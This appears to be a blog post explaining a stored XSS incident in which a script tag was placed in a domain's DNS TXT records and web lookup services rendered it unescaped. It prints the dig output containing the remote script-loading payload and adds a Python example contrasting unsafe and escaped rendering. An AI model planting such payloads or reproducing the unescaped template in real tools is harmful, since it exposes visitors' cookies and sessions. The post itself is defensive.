An XSS (Cross-Site Scripting) attack is a type of injection in which malicious scripts are injected into otherwise trusted web sites. Your browser has no way to know that the script should not be trusted, and will execute it. The script can then access any cookies, session tokens, or other sensitive information on that site and pass them to the attacker.
The golden rule "Do not trust user input" seems forgotten in some cases. Someone managed to inject a malicious script via a TXT record on his own domain, and the script is promptly executed when you look that domain up via web-based whois/DNS lookup services, because they render the record content into their pages without escaping it.
The vulnerable sites:
http://who.is/
http://mxtoolbox.com/
http://dig.whois.com.au/
…
Some of them have already been patched, but the taste remains 🙂
The ycombinator discussion: https://news.ycombinator.com/item?id=8336025
The exact TXT content:
comp@comp ~ $ dig txt jamiehankins.co.uk

; <<>> DiG 9.9.5-3-Ubuntu <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24931
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.            IN      TXT

;; ANSWER SECTION:
jamiehankins.co.uk.     300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.     300     IN      TXT     "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.     300     IN      TXT     "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.     300     IN      TXT     "<script src='//peniscorp.com/topkek.js'></script>"

;; AUTHORITY SECTION:
jamiehankins.co.uk.     172800  IN      NS      hank.ns.cloudflare.com.
jamiehankins.co.uk.     172800  IN      NS      lucy.ns.cloudflare.com.

;; ADDITIONAL SECTION:
hank.ns.cloudflare.com. 11832   IN      A       173.245.59.116
hank.ns.cloudflare.com. 11832   IN      AAAA    2400:cb00:2049:1::adf5:3b74

;; Query time: 81 msec
;; SERVER: 127.0.1.1#53(127.0.1.1)
;; WHEN: Thu Sep 18 23:21:30 CEST 2014
;; MSG SIZE  rcvd: 481
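To make the "do not trust user input" point concrete for this bug class, here is an added example (not code from the post or from any of the sites listed above) of how a web-based DNS lookup tool should treat TXT record data. It parses dig-style answer lines, shows the unsafe pattern the vulnerable sites followed (record text interpolated straight into HTML) next to the hardened version (every field HTML-escaped), and includes a small check a reviewer or unit test can use to confirm that no live markup survives rendering. The DNS records, the domain example.invalid and the verification token are all constructed for the example; only the rendering logic matters.

```python
import html
import re

# Constructed sample: the ANSWER SECTION of a dig-style TXT lookup, as a
# web whois/dig front end would receive it. These are not real records.
SAMPLE_DIG_ANSWER = """\
example.invalid.  300 IN TXT "v=spf1 include:example.invalid -all"
example.invalid.  300 IN TXT "<script src='//example.invalid/x.js'></script>"
example.invalid.  300 IN TXT "google-site-verification=CONSTRUCTED-TOKEN"
"""

# One dig-style TXT line: <name> <ttl> IN TXT "<data>"
TXT_LINE = re.compile(
    r'^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+TXT\s+"(?P<data>.*)"\s*$')


def parse_txt_records(answer_text):
    """Return a list of (name, ttl, data) tuples from dig-style TXT lines.

    The data field is kept exactly as received; it is attacker-controlled
    input, since anyone can publish any bytes in their own TXT records.
    """
    records = []
    for line in answer_text.splitlines():
        m = TXT_LINE.match(line.strip())
        if m:
            records.append((m["name"], int(m["ttl"]), m["data"]))
    return records


def render_unsafe(records):
    """The pattern behind the bug above: record data is interpolated
    straight into the page, so markup inside a TXT record becomes live
    HTML in every visitor's browser."""
    rows = "".join(
        f"<tr><td>{name}</td><td>{ttl}</td><td>{data}</td></tr>"
        for name, ttl, data in records)
    return f"<table>{rows}</table>"


def render_safe(records):
    """Hardened rendering: every untrusted field goes through
    html.escape(quote=True), so the browser displays the record text
    instead of parsing it as markup. The TTL is an int and needs none."""
    rows = "".join(
        f"<tr><td>{html.escape(name, quote=True)}</td>"
        f"<td>{ttl}</td>"
        f"<td>{html.escape(data, quote=True)}</td></tr>"
        for name, ttl, data in records)
    return f"<table>{rows}</table>"


def contains_live_markup(rendered_html, tag="script"):
    """Crude regression check: does the rendered page still contain an
    un-escaped opening tag of the given name? Escaped output carries
    '&lt;script' instead, which this does not match."""
    return re.search(rf"<{tag}\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    recs = parse_txt_records(SAMPLE_DIG_ANSWER)
    print("records parsed:", len(recs))
    print("unsafe render has live <script>:",
          contains_live_markup(render_unsafe(recs)))
    print("safe render has live <script>:  ",
          contains_live_markup(render_safe(recs)))
```

Escaping at the point of output (the template) rather than at the point of input is the right choice here: the tool has to display the record exactly as published, so it cannot sanitise or strip anything on the way in, and a server-side template engine with auto-escaping enabled gives the same result as the explicit html.escape calls above.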